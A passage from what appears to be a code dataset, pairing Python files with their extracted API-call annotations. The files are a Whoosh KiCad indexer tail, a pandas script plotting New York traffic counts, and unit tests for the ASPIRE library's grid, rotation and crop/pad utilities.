for doc in ModDocCreator(path, encoding).create():
writer.add_document(**doc)
for path in list_files(moduledirs, '.kicad_mod'):
for doc in KicadModDocCreator(path, encoding).create():
writer.add_document(**doc)
writer.commit()
searcher = ix.searcher()
count = searcher.doc_count()
searcher.close()
ix.close()
return count
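# A minimal usage sketch (the directories below are hypothetical); the index
# written here can later be opened for querying with whoosh.index.open_dir:
#
#     indexer = KicadIndexer()
#     count = indexer.create_index('indexdir',
#                                  ['/usr/share/kicad/library'],
#                                  ['/usr/share/kicad/modules'],
#                                  'utf-8')
#     print('indexed {} documents'.format(count))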
|
[
"os.mkdir",
"whoosh.fields.ID",
"whoosh.fields.TEXT",
"whoosh.analysis.StemmingAnalyzer",
"os.walk",
"os.path.exists",
"whoosh.fields.NUMERIC",
"whoosh.index.create_in"
] |
[((368, 384), 'os.walk', 'os.walk', (['rootdir'], {}), '(rootdir)\n', (375, 384), False, 'import os\n'), ((1620, 1653), 'whoosh.index.create_in', 'index.create_in', (['indexdir', 'schema'], {}), '(indexdir, schema)\n', (1635, 1653), False, 'from whoosh import index\n'), ((725, 749), 'os.path.exists', 'os.path.exists', (['indexdir'], {}), '(indexdir)\n', (739, 749), False, 'import os\n'), ((763, 781), 'os.mkdir', 'os.mkdir', (['indexdir'], {}), '(indexdir)\n', (771, 781), False, 'import os\n'), ((810, 825), 'whoosh.fields.ID', 'ID', ([], {'stored': '(True)'}), '(stored=True)\n', (812, 825), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((856, 873), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (860, 873), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((904, 921), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (908, 921), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1115, 1132), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (1119, 1132), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1165, 1182), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (1169, 1182), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1213, 1230), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (1217, 1230), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1265, 1285), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1272, 1285), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1318, 1338), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1325, 1338), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1370, 1390), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1377, 1390), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1422, 1439), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (1426, 1439), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1475, 1495), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1482, 1495), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1529, 1549), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1536, 1549), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1582, 1602), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1589, 1602), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((980, 998), 'whoosh.analysis.StemmingAnalyzer', 'StemmingAnalyzer', ([], {}), '()\n', (996, 998), False, 'from whoosh.analysis import StemmingAnalyzer\n'), ((1060, 1078), 'whoosh.analysis.StemmingAnalyzer', 'StemmingAnalyzer', ([], {}), '()\n', (1076, 1078), False, 'from whoosh.analysis import StemmingAnalyzer\n')]
|
#!/usr/bin/env python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import re
gis_file = 'Annual_Average_Daily_Traffic__AADT___Beginning_1977.csv'
df = pd.read_csv(gis_file)
print(df.head())
# remove spaces from column names
cols = df.columns
cols = cols.map(lambda x: x.replace(' ', '_') if isinstance(x, str) else x)
df.columns = cols
print(df.columns)
# Delete the columns we don't care about
df = df.drop(['RC_ID', 'GIS_Code'], axis=1)
# Aggregations
# Find total by year
df_grouped_year = df.groupby(df.Year)
print(df_grouped_year)
df_total_grouped_year = df_grouped_year.sum()
print(df_total_grouped_year)
df_total_grouped_year = df_grouped_year.aggregate({'AADT': np.sum})
print(df_total_grouped_year)
print(df_total_grouped_year.columns)
municipalities = ['NEW YORK CITY', 'TROY', 'CROTON-ON-HUDSON']
df_grouped_muni = df.loc[df.Municipality.isin(municipalities)]
df_total_muni_aadt_grouped = df_grouped_muni.groupby(['Year'])
df_total_muni_aadt = df_total_muni_aadt_grouped.agg({'AADT': np.sum})
print(df_total_muni_aadt.columns)
print(df_total_muni_aadt.head())
exclude_cols = ['Region', 'Begin_Milepoint', 'End_Milepoint']
df_total_muni_aadt.loc[:, df_total_muni_aadt.columns.difference(exclude_cols)].plot(kind='bar')
plt.legend(loc='best').get_texts()[0].set_text('Annual Average Daily Traffic for {}'.format(', '.join(map(str,municipalities))))
file_name = 'AADT_{}'.format('_'.join(map(str,municipalities)))
file_name = re.sub(r'\s+', '_', file_name)
plt.savefig(file_name)
plt.show()
|
[
"matplotlib.pyplot.show",
"pandas.read_csv",
"matplotlib.pyplot.legend",
"re.sub",
"matplotlib.pyplot.savefig"
] |
[((180, 201), 'pandas.read_csv', 'pd.read_csv', (['gis_file'], {}), '(gis_file)\n', (191, 201), True, 'import pandas as pd\n'), ((1485, 1515), 're.sub', 're.sub', (['"""\\\\s+"""', '"""_"""', 'file_name'], {}), "('\\\\s+', '_', file_name)\n", (1491, 1515), False, 'import re\n'), ((1513, 1535), 'matplotlib.pyplot.savefig', 'plt.savefig', (['file_name'], {}), '(file_name)\n', (1524, 1535), True, 'import matplotlib.pyplot as plt\n'), ((1536, 1546), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1544, 1546), True, 'import matplotlib.pyplot as plt\n'), ((1279, 1301), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (1289, 1301), True, 'import matplotlib.pyplot as plt\n')]
|
import os.path
from unittest import TestCase
import numpy as np
from aspire.utils import (
Rotation,
crop_pad_2d,
get_aligned_rotations,
grid_2d,
grid_3d,
register_rotations,
uniform_random_angles,
)
DATA_DIR = os.path.join(os.path.dirname(__file__), "saved_test_data")
class UtilsTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testGrid2d(self):
# Note these reference files were created using Matlab compat grid indexing.
grid2d = grid_2d(8, indexing="xy")
self.assertTrue(
np.allclose(grid2d["x"], np.load(os.path.join(DATA_DIR, "grid2d_8_x.npy")))
)
self.assertTrue(
np.allclose(grid2d["y"], np.load(os.path.join(DATA_DIR, "grid2d_8_y.npy")))
)
self.assertTrue(
np.allclose(grid2d["r"], np.load(os.path.join(DATA_DIR, "grid2d_8_r.npy")))
)
self.assertTrue(
np.allclose(
grid2d["phi"], np.load(os.path.join(DATA_DIR, "grid2d_8_phi.npy"))
)
)
def testGrid3d(self):
# Note these reference files were created using Matlab compat grid indexing.
grid3d = grid_3d(8, indexing="xyz")
self.assertTrue(
np.allclose(grid3d["x"], np.load(os.path.join(DATA_DIR, "grid3d_8_x.npy")))
)
self.assertTrue(
np.allclose(grid3d["y"], np.load(os.path.join(DATA_DIR, "grid3d_8_y.npy")))
)
self.assertTrue(
np.allclose(grid3d["z"], np.load(os.path.join(DATA_DIR, "grid3d_8_z.npy")))
)
self.assertTrue(
np.allclose(grid3d["r"], np.load(os.path.join(DATA_DIR, "grid3d_8_r.npy")))
)
self.assertTrue(
np.allclose(
grid3d["phi"], np.load(os.path.join(DATA_DIR, "grid3d_8_phi.npy"))
)
)
self.assertTrue(
np.allclose(
grid3d["theta"], np.load(os.path.join(DATA_DIR, "grid3d_8_theta.npy"))
)
)
def testRegisterRots(self):
angles = uniform_random_angles(32, seed=0)
rots_ref = Rotation.from_euler(angles).matrices
q_ang = [[np.pi / 4, np.pi / 4, np.pi / 4]]
q_mat = Rotation.from_euler(q_ang).matrices[0]
flag = 0
regrots_ref = get_aligned_rotations(rots_ref, q_mat, flag)
q_mat_est, flag_est = register_rotations(rots_ref, regrots_ref)
self.assertTrue(np.allclose(flag_est, flag) and np.allclose(q_mat_est, q_mat))
def testSquareCrop2D(self):
# Test even/odd cases based on the convention that the center of a sequence of length n
# is (n+1)/2 if n is odd and n/2 + 1 if even.
# Cropping is done to keep the center of the sequence the same value before and after.
# Therefore the following apply:
# Cropping even to odd will result in the 0-index (beginning)
# of the sequence being chopped off (x marks the center, ~ marks deleted data):
# ---x-- => ~--x--
# Cropping odd to even will result in the -1-index (end)
# of the sequence being chopped off:
# ---x--- => ---x--~
# even to even
a = np.diag(np.arange(8))
test_a = np.diag(np.arange(1, 7))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 6)))
# even to odd
# the extra row/column cut off are the top and left
# due to the centering convention
a = np.diag(np.arange(8))
test_a = np.diag(np.arange(1, 8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 7)))
# odd to odd
a = np.diag(np.arange(9))
test_a = np.diag(np.arange(1, 8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 7)))
# odd to even
# the extra row/column cut off are the bottom and right
# due to the centering convention
a = np.diag(np.arange(9))
test_a = np.diag(np.arange(8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 8)))
def testSquarePad2D(self):
# Test even/odd cases based on the convention that the center of a sequence of length n
# is (n+1)/2 if n is odd and n/2 + 1 if even.
# Padding is done to keep the center of the sequence the same value before and after.
# Therefore the following apply:
# Padding from even to odd results in the spare padding being added to the -1-index (end)
# of the sequence (x represents the center, + represents padding):
# ---x-- => ---x--+
# Padding from odd to even results in the spare padding being added to the 0-index (beginning)
# of the sequence:
# --x-- => +--x--
# even to even
a = np.diag(np.arange(1, 9))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 10)))
# even to odd
# the extra padding is to the bottom and right
# due to the centering convention
a = np.diag(np.arange(1, 9))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 11)))
# odd to odd
a = np.diag(np.arange(1, 10))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 11)))
# odd to even
# the extra padding is to the top and left
# due to the centering convention
a = np.diag(np.arange(1, 10))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 10)))
def testRectCrop2D(self):
# Additional sanity checks for rectangular cropping case
# 12x10 -> 10x10
a = np.diag(np.arange(1, 11))
# augment to 12 rows
aug = np.vstack([a, np.zeros(10)])
aug = np.vstack([np.zeros(10), aug])
# make sure the top and bottom rows are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 10)))
# 10x12 -> 10x10
a = np.diag(np.arange(1, 11))
# augment to 12 columns
aug = np.column_stack([a, np.zeros(10)])
aug = np.column_stack([np.zeros(10), aug])
# make sure the left and right columns are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 10)))
# 9x7 -> 7x7
a = np.diag(np.arange(1, 8))
# augment to 9 rows
aug = np.vstack([a, np.zeros(7)])
aug = np.vstack([np.zeros(7), aug])
# make sure the top and bottom rows are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 7)))
# 7x9 -> 7x7
a = np.diag(np.arange(1, 8))
# augment to 9 columns
aug = np.column_stack([a, np.zeros(7)])
aug = np.column_stack([np.zeros(7), aug])
# make sure the left and right columns are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 7)))
def testRectPad2D(self):
# Additional sanity checks for rectangular padding case
# 12x10 -> 12x12
a = np.diag(np.arange(1, 11))
# augment to 12 rows
aug = np.vstack([a, np.zeros(10)])
aug = np.vstack([np.zeros(10), aug])
# expected result
padded = np.column_stack([aug, np.zeros(12)])
padded = np.column_stack([np.zeros(12), padded])
# make sure columns of fill value (0) are added to the
# left and right
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 12)))
# 10x12 -> 12x12
a = np.diag(np.arange(1, 11))
# augment to 12 columns
aug = np.column_stack([a, np.zeros(10)])
aug = np.column_stack([np.zeros(10), aug])
# expected result
padded = np.vstack([aug, np.zeros(12)])
padded = np.vstack([np.zeros(12), padded])
# make sure rows of fill value (0) are added to the
# top and bottom
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 12)))
# 9x7 -> 9x9
a = np.diag(np.arange(1, 8))
# augment to 9 rows
aug = np.vstack([a, np.zeros(7)])
aug = np.vstack([np.zeros(7), aug])
# expected result
padded = np.column_stack([aug, np.zeros(9)])
padded = np.column_stack([np.zeros(9), padded])
# make sure columns of fill value (0) are added to the
# left and right
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 9)))
# 7x9 -> 9x9
a = np.diag(np.arange(1, 8))
# augment to 9 columns
aug = np.column_stack([a, np.zeros(7)])
aug = np.column_stack([np.zeros(7), aug])
# expected result
padded = np.vstack([aug, np.zeros(9)])
padded = np.vstack([np.zeros(9), padded])
# make sure rows of fill value (0) are added to the
# top and bottom
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 9)))
def testCropPad2DError(self):
with self.assertRaises(ValueError) as e:
_ = crop_pad_2d(np.zeros((6, 10)), 8)
self.assertTrue(
"Cannot crop and pad an image at the same time.", str(e.exception)
)
def testCrop2DDtype(self):
# crop_pad_2d must return an array of the same dtype it was given
# in particular, because the method is used for Fourier downsampling
# methods involving cropping complex arrays
self.assertEqual(
crop_pad_2d(np.eye(10).astype("complex"), 5).dtype, np.dtype("complex128")
)
def testCrop2DFillValue(self):
# make sure the fill value is as expected
# we are padding from an odd to an even dimension
# so the padded column is added to the left
a = np.ones((4, 3))
b = crop_pad_2d(a, 4, fill_value=-1)
self.assertTrue(np.array_equal(b[:, 0], np.array([-1, -1, -1, -1])))
|
[
"aspire.utils.Rotation.from_euler",
"aspire.utils.grid_2d",
"numpy.eye",
"aspire.utils.get_aligned_rotations",
"numpy.allclose",
"aspire.utils.crop_pad_2d",
"numpy.dtype",
"numpy.ones",
"numpy.zeros",
"aspire.utils.uniform_random_angles",
"numpy.arange",
"numpy.array",
"aspire.utils.register_rotations",
"numpy.diag",
"aspire.utils.grid_3d"
] |
[((535, 560), 'aspire.utils.grid_2d', 'grid_2d', (['(8)'], {'indexing': '"""xy"""'}), "(8, indexing='xy')\n", (542, 560), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((1216, 1242), 'aspire.utils.grid_3d', 'grid_3d', (['(8)'], {'indexing': '"""xyz"""'}), "(8, indexing='xyz')\n", (1223, 1242), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((2103, 2136), 'aspire.utils.uniform_random_angles', 'uniform_random_angles', (['(32)'], {'seed': '(0)'}), '(32, seed=0)\n', (2124, 2136), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((2340, 2384), 'aspire.utils.get_aligned_rotations', 'get_aligned_rotations', (['rots_ref', 'q_mat', 'flag'], {}), '(rots_ref, q_mat, flag)\n', (2361, 2384), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((2415, 2456), 'aspire.utils.register_rotations', 'register_rotations', (['rots_ref', 'regrots_ref'], {}), '(rots_ref, regrots_ref)\n', (2433, 2456), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((4809, 4848), 'numpy.diag', 'np.diag', (['[0, 1, 2, 3, 4, 5, 6, 7, 8, 0]'], {}), '([0, 1, 2, 3, 4, 5, 6, 7, 8, 0])\n', (4816, 4848), True, 'import numpy as np\n'), ((5091, 5133), 'numpy.diag', 'np.diag', (['[0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 0]'], {}), '([0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 0])\n', (5098, 5133), True, 'import numpy as np\n'), ((5279, 5321), 'numpy.diag', 'np.diag', (['[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0]'], {}), '([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0])\n', (5286, 5321), True, 'import numpy as np\n'), ((5561, 5600), 'numpy.diag', 'np.diag', (['[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]'], {}), '([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n', (5568, 5600), True, 'import numpy as np\n'), ((9797, 9812), 'numpy.ones', 'np.ones', (['(4, 3)'], {}), '((4, 3))\n', (9804, 9812), True, 'import numpy as np\n'), ((9825, 9857), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(4)'], {'fill_value': '(-1)'}), '(a, 4, fill_value=-1)\n', (9836, 9857), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((2156, 2183), 'aspire.utils.Rotation.from_euler', 'Rotation.from_euler', (['angles'], {}), '(angles)\n', (2175, 2183), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((3232, 3244), 'numpy.arange', 'np.arange', (['(8)'], {}), '(8)\n', (3241, 3244), True, 'import numpy as np\n'), ((3271, 3286), 'numpy.arange', 'np.arange', (['(1)', '(7)'], {}), '(1, 7)\n', (3280, 3286), True, 'import numpy as np\n'), ((3500, 3512), 'numpy.arange', 'np.arange', (['(8)'], {}), '(8)\n', (3509, 3512), True, 'import numpy as np\n'), ((3539, 3554), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (3548, 3554), True, 'import numpy as np\n'), ((3665, 3677), 'numpy.arange', 'np.arange', (['(9)'], {}), '(9)\n', (3674, 3677), True, 'import numpy as np\n'), ((3704, 3719), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (3713, 3719), True, 'import numpy as np\n'), ((3937, 3949), 'numpy.arange', 'np.arange', (['(9)'], {}), '(9)\n', (3946, 3949), True, 
'import numpy as np\n'), ((3976, 3988), 'numpy.arange', 'np.arange', (['(8)'], {}), '(8)\n', (3985, 3988), True, 'import numpy as np\n'), ((4775, 4790), 'numpy.arange', 'np.arange', (['(1)', '(9)'], {}), '(1, 9)\n', (4784, 4790), True, 'import numpy as np\n'), ((5057, 5072), 'numpy.arange', 'np.arange', (['(1)', '(9)'], {}), '(1, 9)\n', (5066, 5072), True, 'import numpy as np\n'), ((5244, 5260), 'numpy.arange', 'np.arange', (['(1)', '(10)'], {}), '(1, 10)\n', (5253, 5260), True, 'import numpy as np\n'), ((5526, 5542), 'numpy.arange', 'np.arange', (['(1)', '(10)'], {}), '(1, 10)\n', (5535, 5542), True, 'import numpy as np\n'), ((5811, 5827), 'numpy.arange', 'np.arange', (['(1)', '(11)'], {}), '(1, 11)\n', (5820, 5827), True, 'import numpy as np\n'), ((6114, 6130), 'numpy.arange', 'np.arange', (['(1)', '(11)'], {}), '(1, 11)\n', (6123, 6130), True, 'import numpy as np\n'), ((6431, 6446), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (6440, 6446), True, 'import numpy as np\n'), ((6725, 6740), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (6734, 6740), True, 'import numpy as np\n'), ((7135, 7151), 'numpy.arange', 'np.arange', (['(1)', '(11)'], {}), '(1, 11)\n', (7144, 7151), True, 'import numpy as np\n'), ((7611, 7627), 'numpy.arange', 'np.arange', (['(1)', '(11)'], {}), '(1, 11)\n', (7620, 7627), True, 'import numpy as np\n'), ((8083, 8098), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (8092, 8098), True, 'import numpy as np\n'), ((8548, 8563), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (8557, 8563), True, 'import numpy as np\n'), ((9556, 9578), 'numpy.dtype', 'np.dtype', (['"""complex128"""'], {}), "('complex128')\n", (9564, 9578), True, 'import numpy as np\n'), ((2262, 2288), 'aspire.utils.Rotation.from_euler', 'Rotation.from_euler', (['q_ang'], {}), '(q_ang)\n', (2281, 2288), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((2482, 2509), 'numpy.allclose', 'np.allclose', (['flag_est', 'flag'], {}), '(flag_est, flag)\n', (2493, 2509), True, 'import numpy as np\n'), ((2514, 2543), 'numpy.allclose', 'np.allclose', (['q_mat_est', 'q_mat'], {}), '(q_mat_est, q_mat)\n', (2525, 2543), True, 'import numpy as np\n'), ((3335, 3352), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(6)'], {}), '(a, 6)\n', (3346, 3352), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((3603, 3620), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(7)'], {}), '(a, 7)\n', (3614, 3620), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((3768, 3785), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(7)'], {}), '(a, 7)\n', (3779, 3785), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((4037, 4054), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(8)'], {}), '(a, 8)\n', (4048, 4054), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((4896, 4914), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(10)'], {}), '(a, 10)\n', (4907, 4914), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), 
((5181, 5199), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(11)'], {}), '(a, 11)\n', (5192, 5199), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((5369, 5387), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(11)'], {}), '(a, 11)\n', (5380, 5387), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((5648, 5666), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(10)'], {}), '(a, 10)\n', (5659, 5666), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((5886, 5898), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (5894, 5898), True, 'import numpy as np\n'), ((5926, 5938), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (5934, 5938), True, 'import numpy as np\n'), ((6045, 6065), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(10)'], {}), '(aug, 10)\n', (6056, 6065), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((6198, 6210), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (6206, 6210), True, 'import numpy as np\n'), ((6244, 6256), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (6252, 6256), True, 'import numpy as np\n'), ((6366, 6386), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(10)'], {}), '(aug, 10)\n', (6377, 6386), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((6504, 6515), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (6512, 6515), True, 'import numpy as np\n'), ((6543, 6554), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (6551, 6554), True, 'import numpy as np\n'), ((6661, 6680), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(7)'], {}), '(aug, 7)\n', (6672, 6680), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((6807, 6818), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (6815, 6818), True, 'import numpy as np\n'), ((6852, 6863), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (6860, 6863), True, 'import numpy as np\n'), ((6973, 6992), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(7)'], {}), '(aug, 7)\n', (6984, 6992), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((7210, 7222), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (7218, 7222), True, 'import numpy as np\n'), ((7250, 7262), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (7258, 7262), True, 'import numpy as np\n'), ((7335, 7347), 'numpy.zeros', 'np.zeros', (['(12)'], {}), '(12)\n', (7343, 7347), True, 'import numpy as np\n'), ((7384, 7396), 'numpy.zeros', 'np.zeros', (['(12)'], {}), '(12)\n', (7392, 7396), True, 'import numpy as np\n'), ((7542, 7562), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(12)'], {}), '(aug, 12)\n', (7553, 7562), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((7695, 7707), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (7703, 7707), True, 'import numpy as np\n'), ((7741, 7753), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (7749, 
7753), True, 'import numpy as np\n'), ((7820, 7832), 'numpy.zeros', 'np.zeros', (['(12)'], {}), '(12)\n', (7828, 7832), True, 'import numpy as np\n'), ((7863, 7875), 'numpy.zeros', 'np.zeros', (['(12)'], {}), '(12)\n', (7871, 7875), True, 'import numpy as np\n'), ((8018, 8038), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(12)'], {}), '(aug, 12)\n', (8029, 8038), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((8156, 8167), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (8164, 8167), True, 'import numpy as np\n'), ((8195, 8206), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (8203, 8206), True, 'import numpy as np\n'), ((8279, 8290), 'numpy.zeros', 'np.zeros', (['(9)'], {}), '(9)\n', (8287, 8290), True, 'import numpy as np\n'), ((8327, 8338), 'numpy.zeros', 'np.zeros', (['(9)'], {}), '(9)\n', (8335, 8338), True, 'import numpy as np\n'), ((8484, 8503), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(9)'], {}), '(aug, 9)\n', (8495, 8503), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((8630, 8641), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (8638, 8641), True, 'import numpy as np\n'), ((8675, 8686), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (8683, 8686), True, 'import numpy as np\n'), ((8753, 8764), 'numpy.zeros', 'np.zeros', (['(9)'], {}), '(9)\n', (8761, 8764), True, 'import numpy as np\n'), ((8795, 8806), 'numpy.zeros', 'np.zeros', (['(9)'], {}), '(9)\n', (8803, 8806), True, 'import numpy as np\n'), ((8949, 8968), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(9)'], {}), '(aug, 9)\n', (8960, 8968), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((9083, 9100), 'numpy.zeros', 'np.zeros', (['(6, 10)'], {}), '((6, 10))\n', (9091, 9100), True, 'import numpy as np\n'), ((9906, 9932), 'numpy.array', 'np.array', (['[-1, -1, -1, -1]'], {}), '([-1, -1, -1, -1])\n', (9914, 9932), True, 'import numpy as np\n'), ((9516, 9526), 'numpy.eye', 'np.eye', (['(10)'], {}), '(10)\n', (9522, 9526), True, 'import numpy as np\n')]
|
from setuptools import setup
try:
from g1.devtools import buildtools
except ImportError:
buildtools = None
import startup
